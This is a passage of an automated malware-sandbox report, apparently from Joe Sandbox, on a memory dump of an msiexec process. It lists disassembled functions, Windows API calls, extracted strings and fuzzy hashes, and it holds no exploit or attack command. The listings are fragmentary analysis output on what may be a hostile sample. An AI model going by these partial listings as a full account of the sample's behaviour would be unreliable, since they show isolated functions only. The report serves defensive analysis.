                                                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                            • memset.MSVCRT ref: 0044505E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memchrmemset
                                                                                                            • String ID: PD$PD
                                                                                                            • API String ID: 1581201632-2312785699
                                                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 2163313125-0
                                                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3592753638-3916222277
                                                                                                            • Opcode ID: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                            • Opcode Fuzzy Hash: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                                            • String ID: %s (%s)$YV@
                                                                                                            • API String ID: 3979103747-598926743
                                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                                            • API String ID: 2767993716-572158859
                                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                            • API String ID: 3176057301-2039793938
                                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                            • database is already attached, xrefs: 0042F721
                                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                            • out of memory, xrefs: 0042F865
                                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                            • API String ID: 1297977491-2001300268
                                                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                            • String ID: ($d
                                                                                                            • API String ID: 1140211610-1915259565
                                                                                                            • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                            • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                            APIs
                                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3015003838-0
                                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00407E44
                                                                                                            • memset.MSVCRT ref: 00407E5B
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 59245283-0
                                                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                            • API String ID: 3510742995-3273207271
                                                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                            • String ID: 3A
                                                                                                            • API String ID: 3300951397-293699754
                                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                            • String ID: strings
                                                                                                            • API String ID: 3166385802-3030018805
                                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                            • String ID: r!A
                                                                                                            • API String ID: 2791114272-628097481
                                                                                                            • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                            • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                            • String ID: BIN
                                                                                                            • API String ID: 1668488027-1015027815
                                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                            • String ID: AE$.cfg$General$EA
                                                                                                            • API String ID: 776488737-1622828088
                                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                            • memset.MSVCRT ref: 0040D906
                                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                            • String ID: sysdatetimepick32
                                                                                                            • API String ID: 1028950076-4169760276
                                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID: -journal$-wal
                                                                                                            • API String ID: 438689982-2894717839
                                                                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
